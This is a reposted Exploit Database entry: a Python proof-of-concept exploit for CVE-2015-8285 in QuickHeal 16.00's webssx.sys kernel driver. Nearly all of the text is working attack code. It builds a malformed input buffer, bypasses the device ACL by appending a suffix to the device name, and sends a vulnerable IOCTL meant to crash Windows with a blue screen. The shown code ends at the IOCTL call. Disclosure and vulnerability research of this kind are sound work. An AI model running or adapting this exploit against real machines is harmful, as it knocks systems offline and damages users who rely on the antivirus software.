QuickHeal 16.00 – ‘webssx.sys’ Driver Denial of Service

• Exploit Database
• 50 阅读

• 作者： Fitzl Csaba
  日期： 2016-02-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39475/

• # Exploit Title: QuickHeal webssx.sys driver DOS vulnerability
  # Date: 19/02/2016
  # Exploit Author: Csaba Fitzl
  # Vendor Homepage: http://www.quickheal.co.in/
  # Version: 16.00
  # Tested on: Win7x86, Win7x64
  # CVE : CVE-2015-8285
  
  from ctypes import *
  from ctypes.wintypes import *
  import sys
  
  kernel32 = windll.kernel32
  ntdll = windll.ntdll
  
  #GLOBAL VARIABLES
  
  MEM_COMMIT = 0x00001000
  MEM_RESERVE = 0x00002000
  PAGE_EXECUTE_READWRITE = 0x00000040
  STATUS_SUCCESS = 0
  
  def alloc_in(base,evil_size):
  	""" Allocate input buffer """
  	print "[*] Allocating input buffer"
  	baseadd = c_int(base)
  	size = c_int(evil_size)
  	evil_input = "\x41" * 0x10
  	evil_input += "\x42\x01\x42\x42" #to trigger memcpy
  	evil_input += "\x42" * (0x130-0x14)
  	evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD
  	evil_input += "\x43" * (evil_size-len(evil_input))
  	ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 
  											POINTER(c_int), c_int, c_int]
  	dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, 
  											 byref(size), 
  											 MEM_RESERVE|MEM_COMMIT,
  											 PAGE_EXECUTE_READWRITE)
  	if dwStatus != STATUS_SUCCESS:
  		print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff)
  		sys.exit()
  	written = c_ulong()
  	alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written))
  	if alloc == 0:
  		print "[-] Error while writing our input buffer memory: %s" %\
  			alloc
  		sys.exit()
  
  if __name__ == '__main__':
  	print "[*] webssx BSOD"
  	
  	GENERIC_READ= 0x80000000
  	GENERIC_WRITE = 0x40000000
  	OPEN_EXISTING = 0x3
  	IOCTL_VULN	= 0x830020FC
  	DEVICE_NAME = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver)
  	dwReturn	= c_ulong()
  	driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
  
  	inputbuffer	 = 0x41414141 #memory address of the input buffer
  	inputbuffer_size= 0x1000
  	outputbuffer_size = 0x0
  	outputbuffer	= 0x20000000 
  	alloc_in(inputbuffer,inputbuffer_size)
  	IoStatusBlock = c_ulong()
  	if driver_handle:
  		print "[*] Talking to the driver sending vulnerable IOCTL..."
  		dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
  									 None,
  									 None,
  									 None,
  									 byref(IoStatusBlock),
  									 IOCTL_VULN,
  									 inputbuffer,
  									 inputbuffer_size,
  									 outputbuffer,
  									 outputbuffer_size
  									 )